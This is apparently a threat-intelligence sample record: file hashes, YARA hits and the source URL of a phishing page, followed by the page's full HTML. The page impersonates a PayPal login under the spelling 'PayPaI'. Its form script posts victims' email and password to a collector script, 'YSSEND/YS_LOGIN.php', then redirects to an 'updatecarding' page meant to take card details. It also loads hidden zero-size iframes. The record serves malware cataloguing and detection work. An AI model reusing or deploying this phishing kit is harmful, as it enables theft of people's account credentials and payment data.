Sample details: 3ed3bd0b91bb5a1e0bf56b85ad45d9c2 --

Hashes
MD5: 3ed3bd0b91bb5a1e0bf56b85ad45d9c2
SHA1: c968b6471814b1e7714b1eaf6c7325612d80c0c7
SHA256: dca5f475b56024c7979929fadce8c3a37e5d990d26f44783b34c276e17d46c9b
SSDEEP: 96:9bVZp3KyHfBQPXRrihUbWlIXByyfH7qxBld:9htHfqvxi+TX0kHAld
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/contentis_base64 |
Source
http://mzyb.in/vmru/venum/laproald/Login/0623fdcac8cfa5e5edffefddbf76aa14/loginauth.php?country.x=&locale.x=&SEC.x=ID-PA59c57a595434a6f9f4580d7791fb9090&home?$1$q2horOBt$DgPTOITESKSyuEorQW/yD1$1$q2horOBt$DgPTOITESKSyuEorQW/yD1$1$q2horOBt$DgPTOITESKSyuEorQW/yD1&Safety=WriRF0ZPw9XeCdYJknIUxGzLhAOyc5jVu4SQa6mbDB8vo3ptMEH7lsNfT1K2gqxguMUI0zksr6bWOqHnRJ47ZDiSQYa5XGp1v9KtAPd8hwj2cflBeEmyVL3CTNoF72034063856&$1$q2horOBt$DgPTOITESKSyuEorQW/yD1
Strings
		<!DOCTYPE html>
<html class=" js " lang="en">
	<head>
		<meta charset="utf-8">
		<title>() Log in to your PayPaI account</title>
		<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<meta name="application-name" content="PayPaI">
		<link rel="shortcut icon" href="YSASSETS/img/YS_favicon.ico">
		<link rel="apple-touch-icon" href="style/apple-touch-icon.png">
		<!-- FORM -->
		<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=yes">
		<link rel="stylesheet" href="YSASSETS/css/app_ys.css">
		<link rel="stylesheet" href="YSASSETS/css/ys_rotate.css">
		<script src="YSASSETS/js/modernizr-2.js"></script>
	</head>
	<body>
	<div class="rotation"> <p> Checking your info... </p> </div>
	<div id="main" class="main " role="main">
		<section id="login" class="login" data-role="page" data-title="Log in to your PayPaI account">
			<div class="corral">
			<div id="content" class="contentContainer">
	<header><p class="paypal-logo paypal-logo-long">PayPaI</p></header>
	<h1 class="headerText accessAid">Log in to your PayPaI account</h1>
	<!-- FORM -->
	<form action="" required="required" method="post" class="yass-form-login" name="login" >
		<input name="locale.x" value="en_US" type="hidden">
		<input name="processSignin" value="main" type="hidden">
		<div id="passwordSection" class="clearfix">
			<div class="textInput fieldempty " id="login_emaildiv">
				<div class="fieldWrapper">
					<label for="email" class="fieldLabel">Email address</label>
					<input id="email" name="yass_email" class="hasHelp  validateEmpty  " required="required" aria-required="true" autocomplete="off" placeholder="Email address" type="email">
				</div>
				<div class="errorMessage" id="emailErrorMessage">
					<p class="emptyError">Required</p>
					<p class="invalidError hide">That email format isn
t right</p>
				</div>
			</div>
			<div class="textInput lastInputField" id="login_passworddiv">
				<div class="fieldWrapper">
					<label for="password" class="fieldLabel">Password</label>
					<input id="password" name="yass_password" class="hasHelp  validateEmpty  " required="required" aria-required="true" value="" placeholder="Password" type="password">
				</div>
				<div class="errorMessage" id="passwordErrorMessage">
					<p class="emptyError hide">Required</p>
				</div>
			</div>
		</div>
		<div class="actions actionsSpaced">
			<input class="button actionContinue" type="submit" id="btnLogin" name="btnLogin" value="Log In">
		</div>
		<div class="forgotLink">
			<a href="#" id="forgotPasswordModal" class="scTrack:unifiedlogin-click-forgot-password">Having trouble logging in?</a>
		</div>
	</form>
	<a href="#" class="button secondary" id="createAccount">Sign Up</a>
	</div></div>
	<footer class="footer" role="contentinfo">
		<ul class="footerGroup">
			<li><a href="#">Contact Us</a></li>
			<li><a href="#">Privacy</a></li>
			<li><a href="#">Legal</a></li>
			<li><a href="#">Worldwide</a></li>
		</ul>
	</footer></section></div>
	<div class="transitioning hide"><p class="checkingInfo hide">Checking your info
</p><p class="">Just a second
</p></div>
	<!-- SiteCatalyst Code -->
	<iframe style="width: 0px; height: 0px; border: 0px none; position: absolute; z-index: -999;" title="" src="style/a.htm"></iframe>
	<div aria-label="Password Recovery" aria-describedby="forgot-password-modal" role="dialog" tabindex="-1" style="display: none; top: 134px; left: 511px;" class="ui-dialog ui-widget ui-widget-content ui-corner-all ui-front">
	<div class="ui-dialog-titlebar ui-widget-header ui-corner-all ui-helper-clearfix">
		<span class="ui-dialog-title" id="ui-id-1">&nbsp;</span>
		<button title="close" aria-disabled="false" role="button" class="ui-button ui-widget ui-state-default ui-corner-all ui-button-icon-only ui-dialog-titlebar-close" type="button">
			<span class="ui-button-icon-primary ui-icon ui-icon-closethick"></span>
			<span class="ui-button-text">close</span>
		</button>
	</div>
	<div style="display: block;" class="pwr-modal forgotPasswordModal ui-dialog-content ui-widget-content" id="forgot-password-modal" aria-label="Password Recovery">
		<iframe id="pwdIframe" data-src="/us/webapps/accountrecovery/passwordrecovery" scrolling="no" data-auto-reload="true" data-tabindex="0"></iframe>
	</div></div>
	<iframe src="style/i.htm" style="width: 0; height: 0; border: 0; position:absolute; z-index:-999" id="ppfniframe" name="ppfniframe"></iframe>
	<script src="YSASSETS/js/ys_dowira_jquery.js"></script>
    <script src="YSASSETS/js/ys_dowira_plugins.js"></script>
<script>
            $(".yass-form-login").validate({
                ///////////////////////////////////////////////////////////
                submitHandler: function(form) {
                    $(".rotation").show();
					$.post("YSSEND/YS_LOGIN.php?ajax", $(".yass-form-login").serialize(), function(result) {
                            setTimeout(function() {
                                $(location).attr("href", "updatecarding.php?country.x=&locale.x=&SEC.x=ID-PA40f90909ad60bfed638736c42b9d3867&home?$1$YbdhqdaN$5x7mbEAGOi63/hIBHfsFa0$1$YbdhqdaN$5x7mbEAGOi63/hIBHfsFa0$1$YbdhqdaN$5x7mbEAGOi63/hIBHfsFa0&Safety=oPxESyur7ZpJYbwt3qm2sW6MAjaHz1gBTGVc0kvR5CIiUDfXKLQOdnelh84NF96lW1sJCP2mxgpLEj4NieIDkSOKYB83UhyF97narfQq5tXuTRHVGZowzMbd0vcA95322049735&$1$YbdhqdaN$5x7mbEAGOi63/hIBHfsFa0");
                            });
                    });
                },
                ///////////////////////////////////////////////////////////
            });    
        </script>
	</body>
</html>